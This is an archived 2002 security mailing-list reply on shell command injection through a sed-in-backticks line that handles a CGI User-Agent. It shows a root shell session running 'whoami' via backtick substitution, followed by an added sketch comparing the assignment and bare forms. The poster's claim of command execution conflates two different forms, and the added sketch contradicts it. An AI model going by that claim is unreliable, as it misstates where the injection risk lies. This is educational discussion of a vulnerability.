On Mon, 18 Nov 2002, you wrote:

> Thanks to everyone who replied regarding my attempts
> to stuff shell commands into this line:
>
> > ua=`echo "$HTTP_USER_AGENT" | sed "s#\;##g"`

Obviously I can't speak authoritatively here... I mean the ueber-skilled team vuln-dev people who are paid to do this sort of thing may have top-secret zero-day reasons why this might not work.... but hey it worked for me.

[root@localhost lib]# export LAME=""whoami""""
[root@localhost lib]# `echo "$LAME" | sed "s#\;##g"`
root
[root@localhost lib]#

wh00pz - lookz like command execution to me

In case you didn't realise - it'z the ` and ` characters around the whole expression that allowz uz command execution....

[root@localhost lib]# echo $LAME
whoami
[root@localhost lib]# `echo $LAME`
root
[root@localhost lib]#

BTW - it workz fine in a shell script.....

I'm sure someone has already mentioned this....

Best Regardz

Brian Fury

"You gonna feel the power of my move, you ready?"
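Added example, not part of the original message or thread: a shell sketch that runs the assignment form quoted at the top and the bare backtick line from the session side by side, and reports whether the variable's value was run as a command or only stored. The marker file path, the function names and the sample values are constructed for this illustration.

```shell
#!/bin/sh
# Constructed demo: is the *value* of a variable run as a command?
# MARK is a hypothetical marker file; "touch $MARK" stands in for any command.
MARK="/tmp/cmdsub_demo.$$"

# Report whether the marker appeared, then clean up.
report() {
    if [ -e "$MARK" ]; then echo executed; else echo stored; fi
    rm -f "$MARK"
}

# Form 1: the assignment quoted at the top of the message.
# The backticks run echo and sed; their output is assigned to ua as text.
assign_form() {
    rm -f "$MARK"
    HTTP_USER_AGENT="$1"
    ua=`echo "$HTTP_USER_AGENT" | sed "s#\;##g"`
    report
}

# Form 2: the bare line typed in the session.
# The substitution's output *is* the command line, so the shell runs it.
bare_form() {
    rm -f "$MARK"
    LAME="$1"
    `echo "$LAME" | sed "s#\;##g"`
    report
}

# Stand-alone run with constructed values.
echo "assignment, plain value:     $(assign_form "touch $MARK")"
echo "assignment, backtick value:  $(assign_form "\`touch $MARK\`")"
echo "bare backtick line:          $(bare_form "touch $MARK")"
```

The second call passes a value that itself contains backticks; expansion results are not rescanned for further substitutions, so that value is also stored as text by the assignment.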
This archive was generated by hypermail 2b30 : Tue Nov 19 2002 - 11:23:33 PST